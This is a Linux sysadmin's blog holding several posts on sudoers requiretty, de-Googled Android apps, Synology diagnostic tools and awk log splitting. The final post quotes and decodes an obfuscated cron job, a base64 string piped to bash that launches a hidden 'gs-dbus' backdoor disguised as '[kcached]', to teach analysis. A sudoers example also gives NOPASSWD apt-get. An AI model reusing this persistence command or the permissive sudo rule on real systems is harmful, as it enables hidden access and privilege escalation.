Feuerfest

Just the private blog of a Linux sysadmin

Why I prefer !requiretty over "ssh -t"

Dall-E https://admin.brennt.net/bl-content/uploads/pages/dad5b98ab9f04a2cdca5de3afe2f6b0e/dall-e_sudo.jpg

Claudio Künzler, whom I know briefly from working with him on enhancing is check_equallogic back in 2010, wrote an article over at Geeker's Digest on How to use sudo inside SSH command. Of course he mentions the ssh -t parameter, as without it, we would get the following error message when calling sudo: (Example shamelessly stolen from his article. 😇)

ck@linux:~$ ssh targetserver "sudo whoami"
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

And ssh -t is the right call here. Well, to be fair: It's not the only solution and in my eyes even not the best solution.

No, I am not talking about piping the password into the command prompt which is so often recommend as a solution (it's not!) that it makes me sad.

I am talking about the usage of negating requiretty in the /etc/sudoers file or a file under /etc/sudoers.d/ respectively.

Lets take the /etc/sudoers.d/icinga2 file I use in my article How to monitor your APT-repositories with Icinga:

Here I must use NOPASSWD for all executed commands and monitoring plugins as well as the line Defaults:icinga2 !requiretty. This negates the need for a tty for the icinga2 user completely. Omitting either the NOPASSWD or the !requiretty will give us the error message we see above.

root@admin:~ # cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

It's also possible to just negate requiretty based on the path to the binary. As mentioned in this StackExchange question: How to disable requiretty for a single command in sudoers?

However keep in mind that the ordering of lines in a sudoers file is important! Quoting man sudoers from the SUDOERS FILE FORMAT section:

When multiple entries match for a user, they are applied in order. Where there are multiple matches, the last match is used (which is not necessarily the most specific match).

Why not just use ssh -t?

Personally I prefer the configuration/setting of sudo-related parameters in an /etc/sudoers.d/ file. My reasons are:

When properly configured via a sudoers file it doesn't matter if a command is called via ssh, ssh -t or any other way. Hence enhancing operational stability and making it easier for users as they don't have to remember adding the -t parameter.

And it, at least, servers as some form of documentation that this user/binary is called from another script/host/etc. giving you a clue that these sudo rights are needed/used for.

Comments

What the G? Exploring the current state of Google Apps & Play alternatives for Android ROMs

Photo by Kyle Roxas: https://www.pexels.com/photo/crackers-cheese-and-fruits-2122278/

I use LineageOS on my OnePlus 8T. Sadly I still run it with Android 11 and LineageOS 18.1. Which is quite old in 2025. My plans to update the firmware and ROM got postponed again as non-surprisingly: I need my phone.

However one of the new year resolutions I choose is to finally update my mobile so I'm not lacking behind on Android security updates for several years. *ahem*

To de-google or to not de-google?

Along with this a long-standing idea surfaced again: I want to remove as many Google services as possible without having to give up needed tools/services.

Therefore, the first question regarding updating my mobile is: Do I still want to keep using the Google Apps? Or do I want to use another suite of alternative GApps that enhance privacy at the cost of some features? Or do I want to get rid of Google's apps altogether?

Depending on the choice, I can only use some (or all) Google Apps.

The rule of thumb is: The more functionality you need, the more you are paying with your data. The less privacy you have.

On a normal Android phone, the Google apps (YouTube, Maps, Wallet, etc.) are almost always pre-installed. Contrary custom ROMs often can't pre-install these, as a) Google doesn't allow this, and b) nowadays ROM developers know that users choose an alternative ROM to gain more control over their digital life and therefore explicitly want to disable some (or all) features related to Google's services and apps.

Alternative Google apps packages: The agony of choice

For this, several Google Apps packages exist. All vary in features and what they try to accomplish.

The big three in this field are:

MindTheGapps

Currently I am running LineageOS with MindTheGapps. Which is their current standard (LineageOS Wiki). MindTheGapps uses the proprietary Google services/packages. It just servers as an installer for the official Google packages. This means you can use the Google Play store, Google Maps, every method of authentication with Google Firebase (more relevant than you might think), and the SafetyNet (here is a good site with a presentation, whitepaper & lectures about SafetyNet - also known as DroidGuard) feature on which banking apps often rely. Among all other Google services.

The downside? Google happily leeching as much data from you as they do.
But helpful if you just want a custom ROM and no hassle with non-working apps.

MicroG

A viable alternative is MicroG. MicroG is, to quote the project itself, "A free-as-in-freedom re-implementation of Google’s proprietary Android user space apps and libraries." This means MicroG is a redevelopment to match the functionality while keeping privacy-harming features out. This also means that privacy-focused ROMs like CalyxOS include them and allow users to choose if they want to activate them.

There is an overview about the implementation status of each feature in the MicroG apps: https://github.com/microg/GmsCore/wiki/Implementation-Status. And it also serves as a good example: In MicroG, two Firebase authentication methods are currently not supported. This means if an app you use only uses these two methods, you won't be able to sign in. It's generally advisable to check your important apps if they work with MicroG or not.

The neat thing is that MicroG uses signature spoofing to present itself as the Google apps. Additionally, the long-standing issue with allowing signature spoofing in LineageOS has been fixed recently. This means that if MicroG is installed via F-Droid and the app package is signed with the signature from the MicroG development team, LineageOS allows MicroG to spoof the signatures. Which eliminates many long-standing issues.

The neat thing is: This allows us to simply install MicroG via F-Droid and be done with it. No more incorporating the MicroG image during the flash process.

Information about their F-Droid repository can be found here: https://microg.org/fdroid.html

Please, only install MicroG from their own repository. Don't install it from the PlayStore or other GitHub repositories. It's common to find Malware posing as the official MicroG package. One such example is documented in this Reddit-Thread: https://www.reddit.com/r/MicroG/comments/1icxc8h/malware/

And here is an interview with the MicroG developer about how it all came to be: https://community.e.foundation/t/microg-what-you-need-to-know-a-conversation-with-its-developer-marvin-wissfeld/22700

OpenGApps

Honestly, I still did know this project from when I first flashed my phone. And it was the first project I had a looked after. But sadly it seems that development is currently very slow.

The last news post is from August 23, 2019.
Android 11 is the last supported OS version, according to their homepage.
The last update in their SourceForge repository happened on May 3rd, 2022. Stating that support for Android 11 is, for most variants, still in the testing phase. According to their GitHub issues, some support for Android 12 should be there, but I didn't dig deeper into this.

In this GitHub issue, it's stated that they currently suffer from a lack of supporters/maintainers and have problems with their build server infrastructure, etc.

Therefore, I didn't look any deeper into this. If you want: Here is a link about what package contains which features: https://github.com/opengapps/opengapps/wiki/Advanced-Features-and-Options

Google Play store alternatives

Now that we have decided which package we want to use, we probably want to quit using the Google Play Store. After all, the more Google apps we replace, the less we are dependent on their services running on our phone.

Luckily, there are two app store alternatives that solve all our problems together.

F-Droid

F-Droid is the most commonly used alternative app store. It focuses on OpenSource software, rebuilding the .apk packages from the official repositories. Undesired features such as tracking, ads, or proprietary code are listed on the apps' site. However, due to hosting all files themselves and having a focus on privacy and OpenSource they have their own inclusion policy, which apps need to fulfill in order to be added to F-Droid. Hence, many commercial apps simply can't be added as they either directly use Google's Play services or other proprietary software to build their app. Or the company simply doesn't agree to being hosted on F-Droid.

This has the direct result that many popular apps will & can never be available on F-Droid. Which leads us to...

Aurora OSS

Aurora OSS is another Google Play store alternative. One that is even usable with and without Google services or even MicroG. As Aurora is directly accessing the Google Play store you can download all apps, even the ones you paid for - as long as you log in with your Google account.

For the rest. I recommend reading their project description: https://gitlab.com/AuroraOSS/AuroraStore. The "nicer" looking URL is https://auroraoss.com/; however, this is just to forward you to their GitLab project.

There is however a report that a freshly created Google account that solely used Aurora got deleted after just two hours: https://www.reddit.com/r/degoogle/comments/13td3iq/google_account_deleted_after_2_hours_of_aurora/ and https://news.ycombinator.com/item?id=36098970

But then again, this was the only big reporting on that matter. So I can't really tell what will happen to accounts which are also used for YouTube. Or that have paid apps in the Play store connected to their account.

This discussion on Reddit provides a little bit of insight as to why this could happen to an account.

Conclusion

Aurora combined with F-Droid means we have a solution to get any and all apps we need.

And even if you plan on flashing your Android device or not. Both app stores can be used on any phone. Allowing you to test them out prior to making any fundamental changes to your phone.

Side note: Vanishing developers

While doing my research for this article, I spent some time in the XDA developers forum, on GitHub, GitLab instances, and even SourceForge. And I noticed a constantly reoccurring pattern: many of the developers simply stopped being present in the last few years. No new posts in the XDA Developers forum. No activity on GitHub, etc.

Now it's not uncommon for OpenSource projects to lose contributors or even main project developers. After all, people do have a job, a family, a life. And somehow they need to earn money. Nothing surprising about that.

But I additionally noticed that many seem to be male and of Russian nationality. Given the fact that the Russian attack on Ukraine started in February 2022 and many developers went silent in the last 2-3 years, I have a bad feeling that many of them were conscripted into the Russian army.

Let's just hope that I am wrong...

Comments

How to install DiagnosisTools on my Synology DiskStation 411, or: Why I love the Internet

Synology Inc. https://www.synology.com/img/products/detail/DS423/heading.png

I own a Synology DiskStation 411 - in short: DS411. It looks like the one in the picture - which shows the successor model DS423. The DS411 runs some custom Linux and therefore is missing a lot of common tools. Recently I had some network error which made my NAS unreachable from one of my Proxmox VMs. The debugging process was made harder as I had no tools such as lsof, strace or strings.

I googled a bit and learned that Synology offers a DiagnosisTool package which contains all these tools and more. The package center however showed no such package for me. From the search results I got that it should be shown in the package center if there is a compatible version for the DSM version running on the NAS. So seems there is no compatible version for my DS411 running DSM 6.4.2?

Luckily there is a command to install the tools: synogear install

root@DiskStation:~# synogear install
failed to get DiagnosisTool ... can't parse actual package download link from info file

Okay, that's uncool. But still doesn't explain why we can't install them. What does synogear install actually do? Time to investigate. As we have no stat or whereis we have to resort to command -v which is included in the POSIX standard. (Yes, which is available, but as command is available everywhere that's the better choice.)

root@DiskStation:~# command -v synogear
/usr/syno/bin/synogear
root@DiskStation:~# head /usr/syno/bin/synogear
#!/bin/sh

DEBUG_MODE="no"
TOOL_PATH="/var/packages/DiagnosisTool/target/tool/"
TEMP_PROFILE_DIR="/var/packages/DiagnosisTool/etc/"

STATUS_NOT_INSTALLED=101
STATUS_NOT_LOADED=102
STATUS_LOADED=103
STATUS_REMOVED=104

Nice! /usr/syno/bin/synogear is a simple shellscript. Therefore we can just run it in debug mode and see what is happening without having to read every single line.

root@DiskStation:~# bash -x synogear install
+ DEBUG_MODE=no
+ TOOL_PATH=/var/packages/DiagnosisTool/target/tool/
+ TEMP_PROFILE_DIR=/var/packages/DiagnosisTool/etc/
+ STATUS_NOT_INSTALLED=101
[...]
++ curl -s -L 'https://pkgupdate.synology.com/firmware/v1/get?language=enu&timezone=Amsterdam&unique=synology_88f6282_411&major=6&minor=2&build=25556&package_update_channel=stable&package=DiagnosisTool'
+ reference_json='{"package":{}}'
++ echo '{"package":{}}'
++ jq -e -r '.["package"]["link"]'
+ download_url=null
+ echo 'failed to get DiagnosisTool ... can'\''t parse actual package download link from info file'
failed to get DiagnosisTool ... can't parse actual package download link from info file
+ return 255
+ return 255
+ status=255
+ '[' 255 '!=' 102 ']'
+ return 1
root@DiskStation:~#

The main problem seems to be an empty JSON-Response from https://pkgupdate.synology.com/firmware/v1/get?language=enu&timezone=Amsterdam&unique=synology_88f6282_411&major=6&minor=2&build=25556&package_update_channel=stable&package=DiagnosisTool and opening that URL in a browser confirms it. So there really seems to be no package for my Model and DSM version combination.

Through my search I also learned that there is a package archive at https://archive.synology.com/download/Package/DiagnosisTool/ which listed several versions of the DiagnosisTool. One package for each CPU architecture. But that also didn't give many clues as I wasn't familiar with many of the CPU architectures and nothing seems to match my CPU. No Feroceon or 88FR131 or the like.

root@DiskStation:~# cat /proc/cpuinfo
Processor       : Feroceon 88FR131 rev 1 (v5l)
BogoMIPS        : 1589.24
Features        : swp half thumb fastmult edsp
CPU implementer : 0x56
CPU architecture: 5TE
CPU variant     : 0x2
CPU part        : 0x131
CPU revision    : 1

Hardware        : Synology 6282 board
Revision        : 0000
Serial          : 0000000000000000

As I didn't want to randomly install all sorts of packages for different CPU architectures - not knowing how good or bad Synology is in preventing the installation of non-matching packages, I opted for the r/synology subreddit and stopped my side-quest at this point, focusing on the main problem.

Random redditors to the rescue!

Nothing much happened for 2 months and I had already forgotten about that thread. My problem with the VM was solved in the meantime and I had no reason to pursue it any further.

Then someone replied. This person apparently did try all sorts of packages for the DiskStation additionally providing a link to the package that worked. It was there that I noticed something. The link provided was: https://global.synologydownload.com/download/Package/spk/DiagnosisTool/1.1-0112/DiagnosisTool-88f628x-1.1-0112.spk and I recognized the string 88f628x but couldn't pin down where I had spotted it. Only then it dawned on me: 88f for the Feroceon 88FR131 and 628x for all Synology 628x boards. Could this really be it?

Armed with this information I quickly identified https://global.synologydownload.com/download/Package/spk/DiagnosisTool/3.0.1-3008/DiagnosisTool-88f628x-3.0.1-3008.spk to be the last version for my DS411 and installed it via the package center GUI (button "Manual installation" and then navigated to the downloaded .spk file on my computer).

Note: The .spk file seems to be a normal compressed tar file and can be opened with the usual tools. The file structure inside is roughly the same as with any RPM or DEB package. Making it easy to understand what happens during/after package installation.

The installation went fine, no errors reported and after that synogear install worked:

root@DiskStation:~# synogear install
Tools are installed and ready to use.
DiagnosisTool version: 3.0.1-3008

And I was finally able to use lsof!

root@DiskStation:~# lsof -v
lsof version information:
    revision: 4.89
    latest revision: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/
    latest FAQ: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/FAQ
    latest man page: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/lsof_man
    constructed: Mon Jan 20 18:58:20 CST 2020
    compiler: /usr/local/arm-marvell-linux-gnueabi/bin/arm-marvell-linux-gnueabi-ccache-gcc
    compiler version: 4.6.4
    compiler flags: -DSYNOPLAT_F_ARMV5 -O2 -mcpu=marvell-f -include /usr/syno/include/platformconfig.h -DSYNO_ENVIRONMENT -DBUILD_ARCH=32 -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -g -DSDK_VER_MIN_REQUIRED=600 -pipe -fstack-protector --param=ssp-buffer-size=4 -Wformat -Wformat-security -D_FORTIFY_SOURCE=2 -O2 -Wno-unused-result -DNETLINK_SOCK_DIAG=4 -DLINUXV=26032 -DGLIBCV=215 -DHASIPv6 -DNEEDS_NETINET_TCPH -D_FILE_OFFSET_BITS=64 -D_LARGEFILE64_SOURCE -DLSOF_ARCH="arm" -DLSOF_VSTR="2.6.32" -I/usr/local/arm-marvell-linux-gnueabi/arm-marvell-linux-gnueabi/libc/usr/include -I/usr/local/arm-marvell-linux-gnueabi/arm-marvell-linux-gnueabi/libc/usr/include -O
    loader flags: -L./lib -llsof
    Anyone can list all files.
    /dev warnings are disabled.
    Kernel ID check is disabled.

The redditor was also so nice to let me know that I have to execute synogear install each time before I can use these tools. Huh? Why that? Shouldn't they be in my path?

Turns out: No, the directory /var/packages/DiagnosisTool/target/tool/ isn't included into our PATH environment variable.

root@DiskStation:~# echo $PATH
/sbin:/bin:/usr/sbin:/usr/bin:/usr/syno/sbin:/usr/syno/bin:/usr/local/sbin:/usr/local/bin

synogear install does that. It copies /etc/profile to /var/packages/DiagnosisTool/etc/.profile, while removing all lines starting with PATH or export PATH. Adding the path to the tools directory to the new PATH and exporting that and setting the new .profile file in the ENV environment variable.

Most likely this is just a precaution for novice users.

And to check if the tools are "loaded" they grep if /var/packages/DiagnosisTool/target/tool/ is included in $PATH.

So yeah, there is no technical reason preventing us from just adding /var/packages/DiagnosisTool/target/tool/ to $PATH and be done with that.

And this is why I love the internet. I thought I would've never figured that out if not for someone to post an reply and included the file which worked.

New learnings

Synology mailed me about critical security vulnerabilities present in DSM 6.2.4-25556 Update 7 which are fixed in 6.2.4-25556 Update 8 (read the Release Notes). However the update wasn't offered to me via the normal update dialog in the DSM, as it is a staged rollout. Therefore I opted to download a patch file from the Synology support site. This means I did not download the whole DSM package for a specific version but just from one version to another. And here I noticed that the architecture name is included in the patch filename. Nice.

If you visit https://www.synology.com/en-global/support/download/DS411?version=6.2 do not just click on Download, instead opt to choose your current DSM version and the target version you wish to update to. Then you are offered a patch file and identifier/name for the architecture your DiskStation uses is part of the filename.

This should be a reliable way to identify the architecture for all Synology models - in case it isn't clear through the CPU/board name, etc. as in my case.

List of included tools

Someone ask me for a list of all tools which are included in the DiagnosesTool package. Here you go:

admin@DiskStation:~$ ls -l /var/packages/DiagnosisTool/target/tool/ | awk '{print $9}'
addr2line
addr2name
ar
arping
as
autojump
capsh
c++filt
cifsiostat
clockdiff
dig
domain_test.sh
elfedit
eu-addr2line
eu-ar
eu-elfcmp
eu-elfcompress
eu-elflint
eu-findtextrel
eu-make-debug-archive
eu-nm
eu-objdump
eu-ranlib
eu-readelf
eu-size
eu-stack
eu-strings
eu-strip
eu-unstrip
file
fio
fix_idmap.sh
free
gcore
gdb
gdbserver
getcap
getpcaps
gprof
iftop
iostat
iotop
iperf
iperf3
kill
killall
ld
ld.bfd
ldd
log-analyzer.sh
lsof
ltrace
mpstat
name2addr
ncat
ndisc6
nethogs
nm
nmap
nping
nslookup
objcopy
objdump
perf-check.py
pgrep
pidof
pidstat
ping
ping6
pkill
pmap
ps
pstree
pwdx
ranlib
rarpd
rdisc
rdisc6
readelf
rltraceroute6
run
sa1
sa2
sadc
sadf
sar
setcap
sid2ugid.sh
size
slabtop
sockstat
speedtest-cli.py
strace
strings
strip
sysctl
sysstat
tcpdump_wrapper
tcpspray
tcpspray6
tcptraceroute6
telnet
tload
tmux
top
tracepath
traceroute6
tracert6
uptime
vmstat
w
watch
zblacklist
zmap
ztee
Comments

Howto properly split all logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS based AdBlocking in my home network. Additionally I installed Unbound as recursive DNS resolver on it. Meaning: I can use the RaspberryPi in my network at home as the DNS server for all my devices. This way I don't have to use the DNS-Servers of my ISP granting me some additionally privacy. Additionally I can see which DNS queries are sent by each device. Leading to surprising revelations.

However recently my internet connection was interrupted and afterwards I noticed that I couldn't access any site or services where I used a domain or hostname to connect to. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was fixed easily with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabyte in size. Whoops. That happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen option which is a good idea to trigger after the logrotate. This way Unbound properly closes old filehandles and uses the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}

But wait, there is more

However I had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work conveniently with it. 49.184.687 lines are just too much. Especially on a RaspberryPi with the, in comparison, limited CPU power. Now I could have just split it up after n lines using split -l number-of-lines but that is:

  • Too easy and
  • Did I encounter the need for a script which splits logfile lines based on a range of timestamps more often in the recent time

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines will have the Unix timestamp in brackets, followed by the process name, the log level the message belongs too and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However some multi-line message wont follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will however also show an awk command on how to filter based on the timestamps, useful for logfiles where every line is prefix with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds as date automatically takes 00:00:00 for these values. Automatically giving us the first second of a day. And date also takes care of leap years and possible a lot of other nuisances when it comes to time and date calculations.

To get the last second of a month we simply take the first day of the month, add a month and subtract one second. It can't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599

To verify the value we can use this for-loop. It will give us all the date and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets we need to tell awk to treat either [ or ] as a field separator. Then we can use awk to check if the second field is in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to only output the Unix timestamp.

And as the logfile starts in November 2023 I set the values accordingly. awk then conveniently puts all lines whose timestamp is between these to values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 =< MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log

And this would already work fine, if every line would start with the timestamp. As this is not the case we need to add a bit more logic.

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Export variables so the grep in the sub-shells have this value
      export FIRST_SECOND
      export LAST_SECOND

      # Split logfiles solely based on timestamps
      awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' unbound.log >> "unbound-$YEAR-$MONTH.log"

      # Creating all those separate logfiles will probably fill up our diskspace
      #  therefore we gzip them immediately afterwards
      "$GZIP" "/var/log/unbound/unbound-$YEAR-$MONTH.log"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh.. Yeah, I had a fallacy here. As still wouldn't have worked with multi-line logmessages without a timestamp. Also using grep like this is highly inefficient. While it would be fine for a one-time usage script I still hit a road block.

I just wasn't able to get awk to do what I wanted and I resorted to asking my question on StackOverflow. Better to get the input from others then wasting a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to calculate the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched exactly the line-numbers per month. Even multi-line log messages and empty lines were included.

All I then did was adding gzip to compress the files directly before the next file is created. Just to prevent filling up the disk completely. Additionally I change the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, the logfile name won't work with logrotate. But I just need it to properly dig through the files and the Year-Month naming will be of great help here. Afterwards I don't need them anymore and will delete them. So this was none of my concern.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    if (prev) system("gzip " prev)
    close(prev)
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) system("gzip " prev)
}' unbound.log

No bash script with convoluted logic needed. And easily useable for other logfiles too. Just adopt the starting regular expression to match the one the logfile uses and adopt the logic for strftime so the proper timestamp can be created.

Sometimes it's better to ask other people. 😄

Comments

Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone on the Internet asked on Reddit what this CronJob does, as it looked strange.

{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64. Are very common method to - sort of - hide malicious contents
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge as the |base64 -d|bash; part clearly states that the base64-string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbusdata -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

With these commands do is explained fairly simple. pkill checks (the -0 parameter) if a process named gs-dbus is already running under the user ID 1004. If a process is found pkill exits with 0 and everything after the || (logical OR) is not executed.

The right part of the OR is only executed when pkill exits with a 1 as no process named gs-dbus is found. On the right part there are a few environment variables and parameters being set and the process is started via the /home/admin/www/gs-dbus binary and then renamed into [kcached].

